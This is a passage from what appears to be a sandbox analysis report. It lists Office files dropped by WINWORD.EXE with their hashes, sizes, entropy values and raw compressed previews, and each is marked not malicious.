                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):3611324
                              Entropy (8bit):7.965784120725206
                              Encrypted:false
                              SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                              MD5:FB88BFB743EEA98506536FC44B053BD0
                              SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                              SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                              SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                              Malicious:false
                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):1091485
                              Entropy (8bit):7.906659368807194
                              Encrypted:false
                              SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                              MD5:2192871A20313BEC581B277E405C6322
                              SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                              SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                              SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                              Malicious:false
                              Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):608122
                              Entropy (8bit):7.729143855239127
                              Encrypted:false
                              SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                              MD5:8BA551EEC497947FC39D1D48EC868B54
                              SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                              SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                              SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                              Malicious:false
                              Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):5783
                              Entropy (8bit):7.88616857639663
                              Encrypted:false
                              SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                              MD5:8109B3C170E6C2C114164B8947F88AA1
                              SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                              SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                              SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                              Malicious:false
                              Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):4026
                              Entropy (8bit):7.809492693601857
                              Encrypted:false
                              SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                              MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                              SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                              SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                              SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                              Malicious:false
                              Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):4243
                              Entropy (8bit):7.824383764848892
                              Encrypted:false
                              SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                              MD5:7BC0A35807CD69C37A949BBD51880FF5
                              SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                              SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                              SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                              Malicious:false
                              Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):16806
                              Entropy (8bit):7.9519793977093505
                              Encrypted:false
                              SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                              MD5:950F3AB11CB67CC651082FEBE523AF63
                              SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                              SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                              SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                              Malicious:false
                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):11380
                              Entropy (8bit):7.891971054886943
                              Encrypted:false
                              SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                              MD5:C9F9364C659E2F0C626AC0D0BB519062
                              SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                              SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                              SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                              Malicious:false
                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):6024
                              Entropy (8bit):7.886254023824049
                              Encrypted:false
                              SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                              MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                              SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                              SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                              SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                              Malicious:false
                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):9191
                              Entropy (8bit):7.93263830735235
                              Encrypted:false
                              SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                              MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                              SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                              SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                              SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                              Malicious:false
                              Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):4326
                              Entropy (8bit):7.821066198539098
                              Encrypted:false
                              SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                              MD5:D32E93F7782B21785424AE2BEA62B387
                              SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                              SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                              SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                              Malicious:false
                              Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):7370
                              Entropy (8bit):7.9204386289679745
                              Encrypted:false
                              SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                              MD5:586CEBC1FAC6962F9E36388E5549FFE9
                              SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                              SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                              SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                              Malicious:false
                              Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):5596
                              Entropy (8bit):7.875182123405584
                              Encrypted:false
                              SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                              MD5:CDC1493350011DB9892100E94D5592FE
                              SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                              SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                              SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                              Malicious:false
                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):3683
                              Entropy (8bit):7.772039166640107
                              Encrypted:false
                              SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                              MD5:E8308DA3D46D0BC30857243E1B7D330D
                              SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                              SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                              SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                              Malicious:false
                              Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):4888
                              Entropy (8bit):7.8636569313247335
                              Encrypted:false
